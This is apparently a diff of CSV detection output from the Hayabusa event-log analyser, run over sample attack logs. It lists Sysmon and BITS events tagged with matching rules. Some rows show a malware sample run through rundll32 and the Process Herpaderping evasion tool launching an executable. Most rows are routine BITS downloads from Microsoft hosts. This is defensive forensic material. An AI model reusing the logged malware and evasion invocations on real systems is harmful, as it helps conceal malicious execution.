+2020-10-24 06:58:17.543 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\Rundll32.exe | Tgt Process: C:\Windows\SysWOW64\rundll32.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 7552 | Src PGUID: 747F3D96-51F9-5F93-0000-001003125E00 | Tgt PID: 9116 | Tgt PGUID: 747F3D96-51F9-5F93-0000-0010551E5E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:58:21.695 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 | LID: 0x8a619 | PID: 7504 | PGUID: 747F3D96-51FD-5F93-0000-00103B425E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:58:21.696 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\SysWOW64\rundll32.exe | Tgt Process: C:\Windows\SysWOW64\rundll32.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 9116 | Src PGUID: 747F3D96-51F9-5F93-0000-0010551E5E00 | Tgt PID: 7504 | Tgt PGUID: 747F3D96-51FD-5F93-0000-00103B425E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:58:22.066 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" DATAUS~1.DLL f8755 4624665222 rd | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 | LID: 0x8a619 | PID: 8920 | PGUID: 747F3D96-51FE-5F93-0000-0010DC535E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:58:22.364 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\data.enc | Process: C:\Windows\SysWOW64\rundll32.exe | PID: 8920 | PGUID: 747F3D96-51FE-5F93-0000-0010DC535E00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:58:22.391 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\config.xml | Process: C:\Windows\SysWOW64\rundll32.exe | PID: 8920 | PGUID: 747F3D96-51FE-5F93-0000-0010DC535E00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 22:15:50.672 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-24 22:53:41.949 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amaWj.img?w=100&h=100&m=6&tilesize=medium&x=1912&y=840&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-24 22:53:43.173 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161342140454_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-24 23:25:16.281 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-24 23:25:17.595 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-25 00:07:57.551 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amczd.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-25 00:07:57.815 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161342140454_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-25 05:37:35.394 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amg5S.img?w=100&h=100&m=6&tilesize=medium&x=2238&y=680&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-27 19:17:18.369 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\Downloads\samir.exe | Process: c:\Users\bouss\Downloads\ProcessHerpaderping.exe | PID: 21756 | PGUID: 00247C92-F3AE-5F97-0000-00106ABA0418,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx
+2020-10-27 19:17:18.377 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: c:\Users\bouss\Downloads\ProcessHerpaderping.exe | Tgt Process: samir.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 21756 | Src PGUID: 00247C92-F3AE-5F97-0000-00106ABA0418 | Tgt PID: 21048 | Tgt PGUID: 00247C92-F3AE-5F97-0000-00104EBD0418,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx
+2020-10-27 19:17:18.397 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: "".\samir.exe"" | Process: C:\Users\bouss\Downloads\samir.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ProcessHerpaderping.exe ""c:\Program Files\Internet Explorer\iexplore.exe"" .\samir.exe | LID: 0x1478dc6e | PID: 21048 | PGUID: 00247C92-F3AE-5F97-0000-00104EBD0418",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx
+2020-10-27 19:17:18.397 +09:00,LAPTOP-JU4M3I0E,1,medium,Exec,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/proc_creation_win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx
+2020-11-02 03:28:53.729 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-02 03:30:10.144 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-02 03:30:10.448 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-02 03:30:10.667 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: SetupBinary | URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0008/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-02 03:30:11.059 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: SetupBinary | URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0008/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-02 03:33:01.610 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-05 19:55:56.114 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{DE1AA2CB-2733-420D-BD53-D15E1761ED0D}-86.0.4240.183_86.0.4240.111_chrome_updater.exe | URL: http://r2---sn-5hnekn7d.gvt1.com/edgedl/release2/chrome/APOVneiKVAxsNCc0oAg3ibQ_86.0.4240.183/86.0.4240.183_86.0.4240.111_chrome_updater.exe?cms_redirect=yes&mh=T1&mip=213.127.67.78&mm=28&mn=sn-5hnekn7d&ms=nvh&mt=1604573655&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-05 19:59:25.802 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-05 19:59:51.480 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-05 20:03:04.083 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aHmh2.img?w=100&h=100&m=6&tilesize=medium&x=2005&y=1451&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-05 20:03:05.093 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161342940453_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-05 20:03:06.197 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: http://blob.weather.microsoft.com:80/static/mws-new/WeatherImages/210x173/29.jpg?a,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-05 21:31:12.664 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-05 21:31:12.941 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-05 21:33:21.719 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aFbhf.img?w=100&h=100&m=6&tilesize=medium&x=2920&y=321&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-06 00:25:28.955 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aIYx8.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-06 00:25:30.216 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161342940453_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-06 19:52:28.687 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aKxpG.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-06 23:56:52.824 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-08 00:33:50.498 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19R5M0.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-08 00:36:30.267 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-08 00:36:30.760 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-09 17:25:00.043 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-09 17:28:07.533 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-09 17:28:08.240 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-09 20:33:58.291 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aPIV0.img?w=100&h=100&m=6&tilesize=medium&x=1544&y=1092&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-09 20:33:58.749 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-09 20:33:59.731 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: http://blob.weather.microsoft.com:80/static/mws-new/WeatherImages/210x173/32.jpg?a,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-09 22:29:29.376 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-09 22:29:29.868 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-10 21:35:58.814 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-10 21:36:00.732 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-11 21:51:23.040 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-11 21:51:33.078 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.703 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.714 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.718 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.722 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.743 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.748 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.752 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.756 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.788 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.794 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.798 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.802 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.899 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
